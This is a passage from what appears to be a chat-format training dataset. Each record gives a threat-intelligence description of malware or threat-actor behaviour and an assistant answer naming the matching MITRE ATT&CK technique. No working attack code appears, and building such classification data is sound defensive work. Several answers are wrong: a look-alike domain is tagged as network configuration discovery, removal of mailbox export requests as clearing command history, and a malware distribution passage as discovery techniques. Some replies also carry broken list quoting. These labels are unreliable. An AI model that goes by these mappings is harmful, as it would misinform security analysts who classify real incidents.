maintain persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After the last screenshot was created, it uploads all files from the \"store\" folder to the C2 server \"win-restore[.]ru\". Then, it deletes all the files present in the folder and starts a new screenshot creation cycle. It should be noted that there is no check of what files are uploaded. The files are uploaded via POST HTTP method to the script \"vvd.php\". For this, the following HTTP request is used which contains also data from the victim as well the JPEG files" }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The script queries WMI to list all the explorer.exe processes, where it will try to inject the malicious payload. For the injection, the attackers used Mavinject (a legitimate Windows component that can be used and abused) to perform arbitrary code injections inside any running process. Mavinject.exe has been abused for several years, as indicated in this blog from 2017." }, { "role": "assistant", "content": "T1218.013 - Mavinject" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "searches recursively for Outlook personal storage tables (PST) files within user directories and sends them back to the C2 server." }, { "role": "assistant", "content": "T1114 - Email Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "keylogger) may be missing for these platforms" }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "C:\\Windows\\System32\\sethc.exe" }, { "role": "assistant", "content": "T1546.008 - Event Triggered Execution: Accessibility Features" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can use WMI to execute commands." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "While the seller specifies that HawkEye Reborn should only be used on systems with permission, they also explicitly forbid scanning of HawkEye Reborn executables using antivirus software, likely an attempt to minimize the likelihood that anti-malware solutions will detect HawkEye Reborn binaries.Following these changes, the new developer of HawkEye Reborn has continued to make changes and we expect this to continue as long as the developer can monetize their efforts.As with other malware that we wrote about last year, while the developer claims that the software should only be used on systems with permission, or \"for educational purposes,\" malicious attackers have been continuously leveraging it against various targets around the world.Distribution campaignsFor several months during the last half of 2018 and continuing into 2019, Cisco Talos has observed ongoing malicious email campaigns that are being used to distribute versions of the HawkEye Reborn keylogger/stealer" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery', 'T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UBoatRAT can upload and download files to the victim’s machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BackdoorDiplomacy has copied files of interest to the main drive's recycle bin." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "menuPass has used native APIs including \"GetModuleFileName\", \"lstrcat\", \"CreateFile\", and \"ReadFile\"." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The recording of audio data from the internal microphone is also rather new. Of course, other malware exists which can record audio, but key here is Flame’s completeness – the ability to steal data in so many different ways" }, { "role": "assistant", "content": "T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ChChes samples were digitally signed with a certificate originally used by Hacking Team that was later leaked and subsequently revoked." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "VERMIN uses HTTP for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SpeakUp deletes files to remove evidence on the machine." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In addition to the encrypted strings table, BitPaymer replaces the remaining strings in the binary with hashes and uses an algorithm to match these hashes with strings that exist on the host. The hashing algorithm generates a CRC32 hash of the string, converted to lowercase. This hash is combined with a DWORD using a simple XOR. This string hashing algorithm is identical to the hashing algorithm used in other Dridex modules. The hash algorithm has been replicated in Python below" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has created email accounts that mimic legitimate organizations for its spearphishing operations." }, { "role": "assistant", "content": "T1585.002 - Email Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Netwalker can determine the system architecture it is running on to choose which version of the DLL to use." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MURKYTOP: a command-line reconnaissance tool" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leafminer has infected victims using watering holes." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "provides access to the system via SSH or any other protocol that uses PAM to authenticate." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sakula uses DLL side-loading, typically using a digitally signed sample of Kaspersky Anti-Virus (AV) 6.0 for Windows Workstations or McAfee's Outlook Scan About Box to load malicious DLL files." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleSeed has the ability to communicate with C2 over HTTP." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Unlike a previously reported variant, this version of BADNEWS no longer looks at USB drives for interesting files" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware component, test.exe, uses the Windows command \"cmd.exe\" /C whoami” to verify it is running with the elevated privileges of “System” and creates persistence by creating the following scheduled task" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed) to maintain access to credentials and certain permission levels within an environment (Account Manipulation [T1098]) - Steal the credentials of a specific user or service account to bypass access controls and retain access to remote systems and externally available services (Valid Accounts [T1078]) - Use the Task Scheduler to run programs at system startup or on a scheduled basis for persistence, conduct remote execution for lateral movement, gain SYSTEM privileges for privilege escalation, or run a process under the context of a specified account (Scheduled Task/Job [T1053]) - Abuse the Windows DLLs search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence (Hijack Execution Flow: DLL Search Order Hijacking [T1056.004]) - Exploit hooking to load and execute malicious code within the context of another process to mask the execution, allow access to the process’s memory, and, possibly, gain elevated privileges (Input Capture: Credential API Hooking [T1574.001]) - Use remote services to persist within a victim’s network (External Remote Services [T1133" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell', 'T1569.002 - System Services: Service Execution', 'T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TSCookie has encrypted network communications with RC4." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gathers the username from the victim’s machine." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "On occasions, the phishing emails contained links to external domains to download the first stage, and sometimes the first stage was attached to the email itself" }, { "role": "assistant", "content": "T1598.003 - Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The structure of the domain mimics the Mercator Institute for China Studies (MERICS), whose actual domain is merics.org" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete had a module in its malware to find, encrypt, and upload files from fixed and removable drives." }, { "role": "assistant", "content": "T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TEXTMATE uses DNS TXT records for C2." }, { "role": "assistant", "content": "T1071.004 - Application Layer Protocol: DNS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Taidoor can use TCP for C2 communications." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of retrieving information about the infected system." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "VERMIN encrypts the collected files using 3-DES." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound has removed mailbox export requests from compromised Exchange servers." }, { "role": "assistant", "content": "T1070.003 - Indicator Removal on Host: Clear Command History" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to create a reverse shell." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pasam establishes by infecting the Security Accounts Manager (SAM) DLL to load a malicious DLL dropped to disk." }, { "role": "assistant", "content": "T1547.008 - Boot or Logon Autostart Execution: LSASS Driver" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DDKONG lists files on the victim’s machine." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "recursively generates a list of files within a directory and sends them back to the control server." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stuxnet encrypts exfiltrated data via C2 with static 31-byte long XOR keys." }, { "role": "assistant", "content": "T1560.003 - Archive via Custom Method" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has created new LinkedIn and Twitter accounts to conduct social engineering against potential victims." }, { "role": "assistant", "content": "T1585.001 - Social Media Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KONNI has bypassed UAC by performing token impersonation as well as an RPC-based method, this included bypassing UAC set to “AlwaysNotify\"." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Group has used powershell.exe to download and execute scripts." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete has used AES to exfiltrate documents." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has connected to C2 servers through proxies." }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Amadey has collected the user name from a compromised host using `GetUserNameA`." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Windigo has distributed Windows malware via drive-by downloads." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "China Chopper's server component can download remote files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Monday, February 12, 2018 . Olympic Destroyer Takes Aim At Winter Olympics . This blog post is authored by Warren Mercer and Paul Rascagneres. Olympic Destroyer Workflow . Initial stage . The initial edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9 sample is a binary that, when executed, drops multiple files on to the victim host. SQLite is embedded in the sample: . System Credential Stealer . In additional to the browsers credential stealer, Olympic Destroyer drops and executes a system stealer. This step is executed to ensure that file recovery is not trivial - WBAdmin can be used to recover individual files, folders and also whole drives so this would be a very convenient tool for a sysadmin to use in order to aid recovery. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started. Legitimate File . Additionally, the Olympic Destroyer drops the legitimate, digitally signed, PsExec file in order to perform lateral movement by using this legitimate tool from Microsoft. Using legitimate tools like PsExec will save the adversary time from writing their own tooling. Disruption is the clear objective in this type of attack and it leaves us confident in thinking that the actors behind this were after embarrassment of the Olympic committee during the opening ceremony. Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. categories . Subscribe To Our Feed . Blog Archive . - - - - - - - - - - - - ▼ February (14) CannibalRAT targets Brazil Who Wasn’t Responsible for Olympic Destroyer" }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire can use modules that extract passwords from common web browsers such as Firefox and Chrome." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "certutil is a WIndows component that can download external content to the computer. In a typical attack, the criminals follow this paradigm" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TrickBot has used \"printf\" and file I/O loops to delay process execution as part of API hammering." }, { "role": "assistant", "content": "T1497.003 - Time Based Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a customized XOR algorithm to encrypt C2 communications." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Microsoft Sysinternals is a popular administration tool that can be used to execute binaries on remote systems using a temporary Windows service." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For Operation Sharpshooter, the threat actors staged malicious files on Dropbox and other websites." }, { "role": "assistant", "content": "T1608.001 - Upload Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, threat actors collected a list of open connections on the infected system using `netstat` and checks whether it has an internet connection." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CostaRicto has used a layer of proxies to manage C2 communications." }, { "role": "assistant", "content": "T1090.003 - Proxy: Multi-hop Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can record the sounds from microphones on a computer." }, { "role": "assistant", "content": "T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 created tokens using compromised SAML signing certificates." }, { "role": "assistant", "content": "T1606.002 - Forge Web Credentials: SAML token" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN7 has harvested valid administrative credentials for lateral movement." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA505 has executed commands using \"cmd.exe\"." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Goopy has the ability to disable Microsoft Outlook's security policies to disable macro warnings." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can be launched by using DLL search order hijacking in which the wrapper DLL is placed in the same folder as explorer.exe and loaded during startup into the Windows Explorer process instead of the legitimate library." }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "was added to a legitimate, signed version 5.33 of the CCleaner software and distributed on CCleaner's distribution site." }, { "role": "assistant", "content": "T1195 - Supply Chain Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Linux version of checks if the victim user ID is anything other than zero (normally used for root), and the malware will not execute if it does not have root privileges. also gathers the username of the victim." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbanak has obtained and used open-source tools such as PsExec and Mimikatz." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "steals credentials from its victims." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is executed using rundll32.exe." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot has spread through emails with malicious links." }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROKRAT can capture screenshots of the infected system using the `gdi32` library." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gorgon Group malware can leverage the Windows API call, CreateProcessA(), for execution." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware has specific features that allow the attackers to perform operations related to online banking transactions, password stealing and clipboard monitoring. We also found various versions of the payload: the version focused on stealing data from victims in Brazil is typically unpacked, while the versions targeting banks in Chile and Mexico are packed with VMProtect or Themida" }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 used stolen cookies to access cloud resources, and a forged \"duo-sid\" cookie to bypass MFA set on an email account." }, { "role": "assistant", "content": "T1550.004 - Web Session Cookie" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For C0015, security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-3390 actors installed a credential logger on Microsoft Exchange servers. Threat Group-3390 also leveraged the reconnaissance framework, ScanBox, to capture keystrokes." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Finally, the script stores the encrypted payload in the Windows registry. Note that the attackers seem to use a different registry location per organization. Thus, it is not a useful indicator to detect similar intrusions" }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackLotus claims to come with anti-virtual machine (anti-VM), anti-debug, and code obfuscation features to block malware analysis attempts. The seller also claims that security software cannot detect and kill the bootkit as it runs under the SYSTEM account within a legitimate process." }, { "role": "assistant", "content": "T1497 - Virtualization/Sandbox Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "C2 servers communicated with malware over TCP 8081, 8282, and 8083." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Proton gathers credentials in files for 1password." }, { "role": "assistant", "content": "T1555.005 - Password Managers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Daserf can take screenshots." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once the target’s machine is compromised, the attacker first enumerates all processes running in the system and all services. Then the attacker looks for all administrator accounts on both the local machine and the network. This reflects the Poseidon Group’s familiarity with Windows network administration" }, { "role": "assistant", "content": "T1057 - Process Discovery', 'T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One of the Cobalt 2.0 Group’s latest campaigns, an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor, was investigated and presented by the Talos research team. 